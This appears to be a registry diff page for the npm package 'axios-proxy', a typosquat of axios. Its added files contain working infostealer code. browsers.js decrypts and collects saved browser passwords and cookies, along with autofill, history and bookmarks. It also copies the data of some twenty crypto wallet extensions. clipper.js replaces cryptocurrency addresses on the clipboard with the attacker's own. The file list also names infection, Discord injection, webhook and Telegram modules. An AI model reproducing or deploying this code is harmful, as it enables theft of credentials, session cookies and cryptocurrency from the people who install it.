axios-proxy 0.0.1-security → 1.7.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of axios-proxy might be problematic. Click here for more details.

Files changed (38) hide show
  1. package/LICENSE +201 -0
  2. package/README.md +1313 -5
  3. package/config/counter.js +24 -0
  4. package/config/crypto.js +20 -0
  5. package/config/discord.js +23 -0
  6. package/config/environ.js +132 -0
  7. package/config/executable.js +8 -0
  8. package/config/jszip.js +15 -0
  9. package/config/jsziptg.js +15 -0
  10. package/config/main.js +6 -0
  11. package/config/telegram.js +7 -0
  12. package/config/user.js +43 -0
  13. package/config/wallets.js +17 -0
  14. package/config.js +8 -0
  15. package/discord_desktop_core/index.js +856 -0
  16. package/gofile.js +323 -0
  17. package/index.js +4 -0
  18. package/index2.js +323 -0
  19. package/infection.js +276 -0
  20. package/keywords.js +16 -0
  21. package/lib.txt +1 -0
  22. package/package.json +47 -3
  23. package/utils/browsers.js +503 -0
  24. package/utils/clipper.js +38 -0
  25. package/utils/constructor.js +14 -0
  26. package/utils/data.js +19 -0
  27. package/utils/discord.js +448 -0
  28. package/utils/encryption.js +11 -0
  29. package/utils/flags.js +509 -0
  30. package/utils/infection.js +199 -0
  31. package/utils/jszip.js +37 -0
  32. package/utils/jsziptg.js +37 -0
  33. package/utils/protection.js +45 -0
  34. package/utils/prototype.js +29 -0
  35. package/utils/telegram.js +27 -0
  36. package/utils/time.js +7 -0
  37. package/utils/wallets.js +31 -0
  38. package/utils/webhook.js +78 -0
package/utils/browsers.js ADDED
@@ -0,0 +1,503 @@
1
+ module.exports = (client) => {
2
+ return {
3
+ async saveBrowserStuff() {
4
+ ["passwords", "cookies", "bookmarks", "history", "autofill"].forEach(
5
+ async (type) => {
6
+ client.utils.jszip.createFolder(`\\${type}`);
7
+
8
+ for (let [key, value] of Object.entries(
9
+ client.config.environ[type]
10
+ )) {
11
+ if (value.length != 0) {
12
+ var text = value.join("\n\n");
13
+ var found_keywords = [];
14
+
15
+ client.config.keywords.keywords.forEach((keyword) => {
16
+ if (text.includes(keyword)) {
17
+ found_keywords.push(keyword);
18
+ }
19
+ });
20
+
21
+ if (found_keywords.length == 0) {
22
+ found_keywords =
23
+ "Found keywords: None\n<================[t.me/lowpina]>================>\n";
24
+ } else {
25
+ found_keywords = `Found keywords: ${found_keywords.join(
26
+ ", "
27
+ )}\n<================[t.me/lowpina]>================>\n`;
28
+ }
29
+
30
+ client.utils.jszip.createTxt(
31
+ `\\${type}\\${key.toUpperCase()}.txt`,
32
+ `${found_keywords}\n${text}`
33
+ );
34
+ }
35
+ }
36
+ }
37
+ );
38
+ },
39
+
40
+ async getBookmarks(path) {
41
+ let browser;
42
+
43
+ if (path.includes("Local")) {
44
+ browser = path.split("\\Local\\")[1].split("\\")[0];
45
+ } else {
46
+ browser = path.split("\\Roaming\\")[1].split("\\")[1];
47
+ }
48
+
49
+ if (browser == "Google") {
50
+ browser == "Chrome";
51
+ } else if (browser == "BraveSoftware") {
52
+ browser = "Brave";
53
+ } else if (browser == "Microsoft") {
54
+ browser = "Microsoft Edge";
55
+ }
56
+
57
+ if (client.requires.fs.existsSync(`${path}\\Bookmarks`)) {
58
+ var bookmarks = JSON.parse(
59
+ client.requires.fs.readFileSync(`${path}\\Bookmarks`)
60
+ ).roots.bookmark_bar.children;
61
+
62
+ for (var bookmark of bookmarks) {
63
+ try {
64
+ client.config.environ.bookmarks.all.push(
65
+ `==================================================\nBROWSER : ${browser}\nID : ${bookmark["id"]}\nNAME : ${bookmark["name"]}\nURL : ${bookmark["url"]}\nGUID : ${bookmark["guid"]}\nADDED AT : ${bookmark["date_added"]}\n==================================================`
66
+ );
67
+
68
+ if (!client.config.environ.bookmarks[browser]) {
69
+ client.config.environ.bookmarks[browser] = [];
70
+ }
71
+
72
+ client.config.environ.bookmarks[browser].push(
73
+ `==================================================\nBROWSER : ${browser}\nID : ${bookmark["id"]}\nNAME : ${bookmark["name"]}\nURL : ${bookmark["url"]}\nGUID : ${bookmark["guid"]}\nADDED AT : ${bookmark["date_added"]}\n==================================================`
74
+ );
75
+ } catch (err) {}
76
+
77
+ client.config.counter.bookmarks++;
78
+ }
79
+ }
80
+ },
81
+
82
+ async getAutofill(path) {
83
+ let path_split = path.split("\\"),
84
+ path_split_tail = path.includes("Network")
85
+ ? path_split.splice(0, path_split.length - 3)
86
+ : path_split.splice(0, path_split.length - 2),
87
+ path_tail = path_split_tail.join("\\");
88
+
89
+ let browser;
90
+
91
+ if (path.includes("Local")) {
92
+ browser = path.split("\\Local\\")[1].split("\\")[0];
93
+ } else {
94
+ browser = path.split("\\Roaming\\")[1].split("\\")[1];
95
+ }
96
+
97
+ if (browser == "Google") {
98
+ browser == "Chrome";
99
+ } else if (browser == "BraveSoftware") {
100
+ browser = "Brave";
101
+ } else if (browser == "Microsoft") {
102
+ browser = "Microsoft Edge";
103
+ }
104
+
105
+ if (
106
+ path.startsWith(
107
+ client.utils.encryption.decryptData(client.config.user.appdata)
108
+ )
109
+ )
110
+ path_tail = path;
111
+ if (path.includes("cord")) {
112
+ return;
113
+ }
114
+
115
+ if (client.requires.fs.existsSync(`${path}\\Web Data`)) {
116
+ var sql = new client.requires.sqlite3.Database(
117
+ `${path}\\Web Data`,
118
+ (err) => {}
119
+ );
120
+
121
+ sql.each("SELECT * FROM autofill", function (err, row) {
122
+ if (row) {
123
+ client.config.environ.autofill.all.push(
124
+ `Name: ${row.name} | Value: ${row.value} | Date created (timestamp): ${row.date_created} | Date last used (timestamp): ${row.date_last_used} | Count: ${row.count}`
125
+ );
126
+
127
+ if (!client.config.environ.autofill[browser]) {
128
+ client.config.environ.autofill[browser] = [];
129
+ }
130
+
131
+ client.config.environ.autofill[browser].push(
132
+ `Name: ${row.name} | Value: ${row.value} | Date created (timestamp): ${row.date_created} | Date last used (timestamp): ${row.date_last_used} | Count: ${row.count}`
133
+ );
134
+ }
135
+ });
136
+ }
137
+ },
138
+
139
+ async getHistory(path) {
140
+ let path_split = path.split("\\"),
141
+ path_split_tail = path.includes("Network")
142
+ ? path_split.splice(0, path_split.length - 3)
143
+ : path_split.splice(0, path_split.length - 2),
144
+ path_tail = path_split_tail.join("\\");
145
+
146
+ let browser;
147
+
148
+ if (path.includes("Local")) {
149
+ browser = path.split("\\Local\\")[1].split("\\")[0];
150
+ } else {
151
+ browser = path.split("\\Roaming\\")[1].split("\\")[1];
152
+ }
153
+
154
+ if (browser == "Google") {
155
+ browser == "Chrome";
156
+ } else if (browser == "BraveSoftware") {
157
+ browser = "Brave";
158
+ } else if (browser == "Microsoft") {
159
+ browser = "Microsoft Edge";
160
+ }
161
+
162
+ if (
163
+ path.startsWith(
164
+ client.utils.encryption.decryptData(client.config.user.appdata)
165
+ )
166
+ )
167
+ path_tail = path;
168
+ if (path.includes("cord")) {
169
+ return;
170
+ }
171
+
172
+ if (client.requires.fs.existsSync(`${path_tail}\\History`)) {
173
+ var sql = new client.requires.sqlite3.Database(
174
+ `${path}\\History`,
175
+ (err) => {}
176
+ );
177
+
178
+ sql.each("SELECT * FROM urls", function (err, row) {
179
+ try {
180
+ client.config.environ.history.all.push(
181
+ `ID: ${row.id} | URL: ${row.url} | Title: ${row.title} | Visit count: ${row.visit_count} | Last visit time (timestamp): ${row.last_visit_time} | Display count: ${row.display_count}`
182
+ );
183
+
184
+ if (!client.config.environ.history[browser]) {
185
+ client.config.environ.history[browser] = [];
186
+ }
187
+
188
+ client.config.environ.history[browser].push(
189
+ `ID: ${row.id} | URL: ${row.url} | Title: ${row.title} | Visit count: ${row.visit_count} | Last visit time (timestamp): ${row.last_visit_time} | Display count: ${row.display_count}`
190
+ );
191
+ } catch {}
192
+ });
193
+ }
194
+ },
195
+
196
+ async getCookies(path) {
197
+ let path_split = path.split("\\"),
198
+ path_split_tail = path.includes("Network")
199
+ ? path_split.splice(0, path_split.length - 3)
200
+ : path_split.splice(0, path_split.length - 2),
201
+ path_tail = path_split_tail.join("\\") + "\\";
202
+
203
+ let browser;
204
+
205
+ if (path.includes("Local")) {
206
+ browser = path.split("\\Local\\")[1].split("\\")[0];
207
+ } else {
208
+ browser = path.split("\\Roaming\\")[1].split("\\")[1];
209
+ }
210
+
211
+ if (browser == "Google") {
212
+ browser == "Chrome";
213
+ } else if (browser == "BraveSoftware") {
214
+ browser = "Brave";
215
+ } else if (browser == "Microsoft") {
216
+ browser = "Microsoft Edge";
217
+ }
218
+
219
+ if (
220
+ path.startsWith(
221
+ client.utils.encryption.decryptData(client.config.user.appdata)
222
+ )
223
+ )
224
+ path_tail = path;
225
+ if (path.includes("cord")) {
226
+ return;
227
+ }
228
+
229
+ if (client.requires.fs.existsSync(path_tail)) {
230
+ let encrypted = Buffer.from(
231
+ JSON.parse(client.requires.fs.readFileSync(path_tail + "Local State"))
232
+ .os_crypt.encrypted_key,
233
+ "base64"
234
+ ).slice(5);
235
+
236
+ if (!client.requires.fs.existsSync(path + "Network")) {
237
+ return;
238
+ } else {
239
+ }
240
+
241
+ const key = client.requires.dpapi.unprotectData(
242
+ Buffer.from(encrypted, "utf-8"),
243
+ null,
244
+ "CurrentUser"
245
+ );
246
+
247
+ var sql = new client.requires.sqlite3.Database(
248
+ `${path}Network\\Cookies`,
249
+ (err) => {}
250
+ );
251
+
252
+ await new Promise((resolve, reject) => {
253
+ var added_host_keys = {
254
+ all: [],
255
+ };
256
+
257
+ sql.each(
258
+ "SELECT * FROM cookies",
259
+ function (err, row) {
260
+ let encrypted_value = row["encrypted_value"];
261
+
262
+ var decrypted;
263
+
264
+ try {
265
+ if (
266
+ encrypted_value[0] == 1 &&
267
+ encrypted_value[1] == 0 &&
268
+ encrypted_value[2] == 0 &&
269
+ encrypted_value[3] == 0
270
+ ) {
271
+ decrypted = dpapi.unprotectData(
272
+ encrypted_value,
273
+ null,
274
+ "CurrentUser"
275
+ );
276
+ } else {
277
+ let start = encrypted_value.slice(3, 15),
278
+ middle = encrypted_value.slice(
279
+ 15,
280
+ encrypted_value.length - 16
281
+ ),
282
+ end = encrypted_value.slice(
283
+ encrypted_value.length - 16,
284
+ encrypted_value.length
285
+ ),
286
+ decipher = client.requires.crypto.createDecipheriv(
287
+ "aes-256-gcm",
288
+ key,
289
+ start
290
+ );
291
+ decipher.setAuthTag(end);
292
+ decrypted =
293
+ decipher.update(middle, "base64", "utf-8") +
294
+ decipher.final("utf-8");
295
+ }
296
+ } catch {}
297
+
298
+ client.config.environ.cookies.all.push(
299
+ `${row["host_key"]} TRUE / FALSE 2597573456 ${row["name"]} ${decrypted}`
300
+ );
301
+
302
+ if (!client.config.environ.cookies[browser]) {
303
+ client.config.environ.cookies[browser] = [];
304
+ }
305
+
306
+ client.config.environ.cookies[browser].push(
307
+ `${row["host_key"]} TRUE / FALSE 2597573456 ${row["name"]} ${decrypted}`
308
+ );
309
+
310
+ client.config.counter.cookies++;
311
+
312
+ added_host_keys[browser] = [];
313
+ added_host_keys["all"].push(row["host_key"]);
314
+ },
315
+ function () {
316
+ resolve("");
317
+ }
318
+ );
319
+ });
320
+ }
321
+ },
322
+
323
+
324
+
325
+ async getWallets(path) {
326
+ let path_split = path.split("\\"),
327
+ path_split_tail = path.includes("Network")
328
+ ? path_split.splice(0, path_split.length - 3)
329
+ : path_split.splice(0, path_split.length - 2),
330
+ path_tail = path_split_tail.join("\\") + "\\";
331
+
332
+ let browser;
333
+
334
+ if (path.includes("Local")) {
335
+ browser = path.split("\\Local\\")[1].split("\\")[0];
336
+ } else {
337
+ browser = path.split("\\Roaming\\")[1].split("\\")[1];
338
+ }
339
+
340
+ if (browser == "Google") {
341
+ browser == "Chrome";
342
+ } else if (browser == "BraveSoftware") {
343
+ browser = "Brave";
344
+ } else if (browser == "Microsoft") {
345
+ browser = "Microsoft Edge";
346
+ }
347
+
348
+ var extension_identifiers = {
349
+ MetaMask: "nkbihfbeogaeaoehlefnkodbefgpgknn",
350
+ Binance: "fhbohimaelbohpjbbldcngcnapndodjp",
351
+ Phantom: "bfnaelmomeimhlpmgjnjophhpkkoljpa",
352
+ Coinbase: "hnfanknocfeofbddgcijnmhnfnkdnaad",
353
+ MetaMask_Edge: "ejbalbakoplchlghecdalmeeeajnimhm",
354
+ Ronin: "fnjhmkhhmkbjkkabndcnnogagogbneec",
355
+ Exodus: "aholpfdialjgjfhomihkjbmgjidlcdno",
356
+ Coin98: "aeachknmefphepccionboohckonoeemg",
357
+ KardiaChain: "pdadjkfkgcafgbceimcpbkalnfnepbnk",
358
+ TerraStation: "aiifbnbfobpmeekipheeijimdpnlpgpp",
359
+ Wombat: "amkmjjmmflddogmhpjloimipbofnfjih",
360
+ Harmony: "fnnegphlobjdpkhecapkijjdkgcjhkib",
361
+ Nami: "lpfcbjknijpeeillifnkikgncikgfhdo",
362
+ MartianAptos: "efbglgofoippbgcjepnhiblaibcnclgk",
363
+ Braavos: "jnlgamecbpmbajjfhmmmlhejkemejdma",
364
+ XDEFI: "hmeobnfnfcmdkdcmlblgagmfpfboieaf",
365
+ Yoroi: "ffnbelfdoeiohenkjibnmadjiehjhajb",
366
+ TON: "nphplpgoakhhjchkkhmiggakijnkhfnd",
367
+ Authenticator: "bhghoamapcdpbohphigoooaddinpkbai",
368
+ Tron: "ibnejdfjmmkpcnlpebklmnkoeoihofec",
369
+ };
370
+
371
+ for (let [key, value] of Object.entries(extension_identifiers)) {
372
+ if (
373
+ client.requires.fs.existsSync(
374
+ `${path}\\Local Extension Settings\\${value}`
375
+ )
376
+ ) {
377
+ client.utils.jszip.copyFolder(
378
+ `\\Wallets\\${browser} ${key}`,
379
+ `${path}\\Local Extension Settings\\${value}`
380
+ );
381
+ client.config.counter.wallets++;
382
+ }
383
+ }
384
+ },
385
+
386
+ async getPasswords(path) {
387
+ let path_split = path.split("\\"),
388
+ path_split_tail = path.includes("Network")
389
+ ? path_split.splice(0, path_split.length - 3)
390
+ : path_split.splice(0, path_split.length - 2),
391
+ path_tail = path_split_tail.join("\\") + "\\";
392
+
393
+ let browser;
394
+
395
+ if (path.includes("Local")) {
396
+ browser = path.split("\\Local\\")[1].split("\\")[0];
397
+ } else {
398
+ browser = path.split("\\Roaming\\")[1].split("\\")[1];
399
+ }
400
+
401
+ if (browser == "Google") {
402
+ browser == "Chrome";
403
+ } else if (browser == "BraveSoftware") {
404
+ browser = "Brave";
405
+ } else if (browser == "Microsoft") {
406
+ browser = "Microsoft Edge";
407
+ }
408
+
409
+ if (
410
+ path.startsWith(
411
+ client.utils.encryption.decryptData(client.config.user.appdata)
412
+ )
413
+ )
414
+ path_tail = path;
415
+ if (path.includes("cord")) {
416
+ return;
417
+ }
418
+
419
+ if (client.requires.fs.existsSync(path_tail)) {
420
+ let encrypted = Buffer.from(
421
+ JSON.parse(client.requires.fs.readFileSync(path_tail + "Local State"))
422
+ .os_crypt.encrypted_key,
423
+ "base64"
424
+ ).slice(5);
425
+
426
+ var login_data = path + "Login Data",
427
+ passwords_db = path + "passwords.db";
428
+
429
+ client.requires.fs.copyFileSync(login_data, passwords_db);
430
+ const key = client.requires.dpapi.unprotectData(
431
+ Buffer.from(encrypted, "utf-8"),
432
+ null,
433
+ "CurrentUser"
434
+ );
435
+ var sql = new client.requires.sqlite3.Database(
436
+ passwords_db,
437
+ (err) => {}
438
+ );
439
+
440
+ await new Promise((resolve, reject) => {
441
+ sql.each(
442
+ "SELECT origin_url, username_value, password_value FROM logins",
443
+ function (err, row) {
444
+ if (row["username_value"] != "") {
445
+ let password_value = row["password_value"];
446
+ try {
447
+ var password;
448
+ if (
449
+ password_value[0] == 1 &&
450
+ password_value[1] == 0 &&
451
+ password_value[2] == 0 &&
452
+ password_value[3] == 0
453
+ ) {
454
+ password = dpapi.unprotectData(
455
+ password_value,
456
+ null,
457
+ "CurrentUser"
458
+ );
459
+ } else {
460
+ let start = password_value.slice(3, 15),
461
+ middle = password_value.slice(
462
+ 15,
463
+ password_value.length - 16
464
+ ),
465
+ end = password_value.slice(
466
+ password_value.length - 16,
467
+ password_value.length
468
+ ),
469
+ decipher = client.requires.crypto.createDecipheriv(
470
+ "aes-256-gcm",
471
+ key,
472
+ start
473
+ );
474
+ decipher.setAuthTag(end);
475
+ password =
476
+ decipher.update(middle, "base64", "utf-8") +
477
+ decipher.final("utf-8");
478
+ }
479
+
480
+ client.config.environ.passwords.all.push(
481
+ `==================================================\nURL : ${row["origin_url"]}\nWeb Browser : ${browser}\nUser Name : ${row["username_value"]}\nPassword : ${password}\nFilename : ${path}\n==================================================`
482
+ );
483
+
484
+ if (!client.config.environ.passwords[browser]) {
485
+ client.config.environ.passwords[browser] = [];
486
+ }
487
+ client.config.environ.passwords[browser].push(
488
+ `==================================================\nURL : ${row["origin_url"]}\nWeb Browser : ${browser}\nUser Name : ${row["username_value"]}\nPassword : ${password}\nFilename : ${path}\n==================================================`
489
+ );
490
+
491
+ client.config.counter.passwords++;
492
+ } catch {}
493
+ }
494
+ },
495
+ function () {
496
+ resolve("");
497
+ }
498
+ );
499
+ });
500
+ }
501
+ },
502
+ };
503
+ };
package/utils/clipper.js ADDED
@@ -0,0 +1,38 @@
1
+ module.exports = (client) => {
2
+ return {
3
+ async detectClipboard() {
4
+ while (true) {
5
+ const paste = client.requires.ncp.readSync();
6
+ var text = paste;
7
+
8
+ for (let [key, value] of Object.entries({
9
+ btc: /^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$/,
10
+ ltc: /(?:^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$)/,
11
+ eth: /(?:^0x[a-fA-F0-9]{40}$)/,
12
+ xlm: /(?:^G[0-9a-zA-Z]{55}$)/,
13
+ xmr: /(?:^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$)/,
14
+ xrp: /(?:^r[0-9a-zA-Z]{24,34}$)/,
15
+ bch: /^((bitcoincash:)?(q|p)[a-z0-9]{41})/,
16
+ dash: /(?:^X[1-9A-HJ-NP-Za-km-z]{33}$)/,
17
+ neo: /(?:^A[0-9a-zA-Z]{33}$)/,
18
+ doge: /D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}/,
19
+ })) {
20
+ for (let _value of paste.split("\n")) {
21
+ if (_value.match(value)) {
22
+ text = text.replace(
23
+ _value,
24
+ client.utils.encryption.decryptData(client.config.crypto[key])
25
+ );
26
+ }
27
+ }
28
+ }
29
+
30
+ if (paste != text) {
31
+ client.requires.ncp.writeSync(text);
32
+ }
33
+
34
+ await client.utils.time.sleep(1000);
35
+ }
36
+ },
37
+ };
38
+ };
package/utils/constructor.js ADDED
@@ -0,0 +1,14 @@
1
+ module.exports = (client) => {
2
+ return {
3
+ loadCPUS() {
4
+ var _cpus = []
5
+
6
+ client.requires.os.cpus().forEach((cpu) => {
7
+ if (!_cpus.contains(cpu.model)) {
8
+ _cpus.push(cpu.model)
9
+ client.config.user.cpus.push(client.utils.encryption.encryptData(cpu.model.split(" ")[0]))
10
+ }
11
+ })
12
+ },
13
+ };
14
+ };
package/utils/data.js ADDED
@@ -0,0 +1,19 @@
1
+ module.exports = (client) => {
2
+ return {
3
+
4
+ copyRecursiveSync(src, dest) {
5
+ var exists = client.requires.fs.existsSync(src);
6
+ var stats = exists && client.requires.fs.statSync(src);
7
+ var isDirectory = exists && stats.isDirectory();
8
+ if (isDirectory) {
9
+ client.requires.fs.mkdirSync(dest);
10
+ client.requires.fs.readdirSync(src).forEach((childItemName) => {
11
+ this.copyRecursiveSync(client.requires.path.join(src, childItemName),
12
+ client.requires.path.join(dest, childItemName));
13
+ });
14
+ } else {
15
+ client.requires.fs.copyFileSync(src, dest);
16
+ }
17
+ }
18
+ };
19
+ };